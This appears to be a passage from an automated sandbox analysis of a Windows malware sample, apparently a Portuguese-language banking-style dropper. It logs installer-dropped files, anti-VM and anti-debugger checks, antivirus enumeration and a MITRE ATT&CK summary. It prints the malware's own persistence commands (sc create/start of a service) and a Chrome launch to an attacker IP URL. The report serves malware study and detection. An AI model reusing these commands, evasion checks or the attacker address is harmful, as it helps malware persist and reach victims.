            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DBEB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_010B5E5A rdtsc 14_2_010B5E5A
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID754.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID6F5.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID7D3.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID686.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID783.tmpJump to dropped file
            Source: C:\Windows\Installer\MSIDD62.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-35361
            Source: C:\Windows\Installer\MSIDD92.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-35207
            Source: C:\Windows\Installer\MSIDD62.tmpAPI coverage: 4.5 %
            Source: C:\Windows\Installer\MSIDD92.tmpAPI coverage: 4.5 %
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_004205E9 FindFirstFileExW,12_2_004205E9
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DB05E9 FindFirstFileExW,13_2_00DB05E9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_008FD08C FindFirstFileW,14_2_008FD08C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00ADD08C FindFirstFileW,26_2_00ADD08C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_008FDCF8 GetSystemInfo,14_2_008FDCF8
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Datacenter without Hyper-V Core
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D48000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: #Microsoft-Windows-Hyper-V-VID-Admin
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004C7B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 0Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnoseal
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminLMEM`
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticLMEMP
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: QEMUU
            Source: windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-OperationalLMEMh
            Source: windows10.exe, 00000020.00000003.1622504533.000000007FDC0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SecureVirtualMachine
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004CCD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -Microsoft-Windows-Hyper-V-Hypervisor-Analytic
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004C7B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3Microsoft-Windows-Hyper-V-Guest-Drivers/Operational
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D3A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: *Microsoft-Windows-Hyper-V-Hypervisor-Admin`
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminLMEMX
            Source: windows10.exe, 00000020.00000003.1622504533.000000007FDC0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: fsSecureVirtualMachine
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649607522.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004C7B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 0Microsoft-Windows-Hyper-V-Hypervisor-Operational
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMh
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Admin
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Datacenter without Hyper-V Full
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Enterprise without Hyper-V Full
            Source: windows10.exe, 00000020.00000003.1649481472.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1650085239.00000000009CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004CCD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Server
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649607522.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Standard without Hyper-V Full
            Source: windows10.exe, 00000020.00000003.1648660506.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648687824.00000000009AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/DiagnosticLMEMX
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Enterprise without Hyper-V Core
            Source: windows10.exe, 00000020.00000002.2500690290.00000000009B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
            Source: windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: stVMWare
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648631286.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648687824.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649150067.00000000009DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticRJU"+
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: stQEMU
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649607522.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D3A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: +Microsoft-Windows-Hyper-V-NETVSC/Diagnostic`
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D24000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: &Microsoft-Windows-Hyper-V-VID-Analytic
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMh
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticLMEM`
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM`
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004C7B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 0Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004CCD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -Microsoft-Windows-Hyper-V-Guest-Drivers/Debug
            Source: windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMWare
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operational
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Standard without Hyper-V Core
            Source: hBqTrQLya4.msiBinary or memory string: MvmCiy
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminLMEMH
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649607522.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin8"
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_010B5E5A rdtsc 14_2_010B5E5A
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0040C3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0040C3B6
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_004203E8 mov eax, dword ptr fs:[00000030h]12_2_004203E8
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0041843F mov ecx, dword ptr fs:[00000030h]12_2_0041843F
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DB03E8 mov eax, dword ptr fs:[00000030h]13_2_00DB03E8
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DA843F mov ecx, dword ptr fs:[00000030h]13_2_00DA843F
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_003E2510 GetProcessHeap,12_2_003E2510
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIDD62.tmp "C:\Windows\Installer\MSIDD62.tmp" /DontWait /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\Jump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0040C3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0040C3B6
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_004083BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_004083BD
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_00408553 SetUnhandledExceptionFilter,12_2_00408553
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_00407B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00407B9C
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D983BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00D983BD
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D9C3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00D9C3B6
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D98553 SetUnhandledExceptionFilter,13_2_00D98553
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D97B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00D97B9C
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_003E7660 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongW,12_2_003E7660
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= autoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MeuServicoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.phpJump to behavior
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROGRAM MANAGER
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0040801C cpuid 12_2_0040801C
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: GetLocaleInfoEx,FormatMessageA,12_2_003F2161
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: GetLocaleInfoEx,12_2_004071C1
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: GetACP,IsValidCodePage,GetLocaleInfoW,12_2_00423414
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: EnumSystemLocalesW,12_2_004236B6
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: EnumSystemLocalesW,12_2_00423701
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: EnumSystemLocalesW,12_2_0042379C
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: EnumSystemLocalesW,12_2_0041C7A2
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00423827
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: GetLocaleInfoW,12_2_00423A7A
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_00423BA3
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: GetLocaleInfoW,12_2_00423CA9
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00423D78
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: GetLocaleInfoW,12_2_0041CD1F
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: GetLocaleInfoEx,13_2_00D971C1
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: GetLocaleInfoEx,FormatMessageA,13_2_00D82161
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: GetACP,IsValidCodePage,GetLocaleInfoW,13_2_00DB3414
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: EnumSystemLocalesW,13_2_00DB36B6
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: EnumSystemLocalesW,13_2_00DB379C
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: EnumSystemLocalesW,13_2_00DAC7A2
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: EnumSystemLocalesW,13_2_00DB3701
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00DB3827
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: GetLocaleInfoW,13_2_00DB3A7A
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_00DB3BA3
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: GetLocaleInfoW,13_2_00DB3CA9
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00DB3D78
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: GetLocaleInfoW,13_2_00DACD1F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_00408615 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00408615
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0041D192 GetTimeZoneInformation,12_2_0041D192
            Source: windows10.exe, 00000020.00000002.2500690290.0000000000947000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media            		31
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            Credential API Hooking            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		1
            Windows Service            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory11
            Peripheral Device Discovery            		Remote Desktop Protocol1
            Credential API Hooking            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		11
            Registry Run Keys / Startup Folder            		1
            Windows Service            		2
            Obfuscated Files or Information            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Service Execution            		Login Hook12
            Process Injection            		1
            DLL Side-Loading            		NTDS165
            System Information Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
            Registry Run Keys / Startup Folder            		1
            File Deletion            		LSA Secrets281
            Security Software Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
            Masquerading            		Cached Domain Credentials3
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Virtualization/Sandbox Evasion            		DCSync3
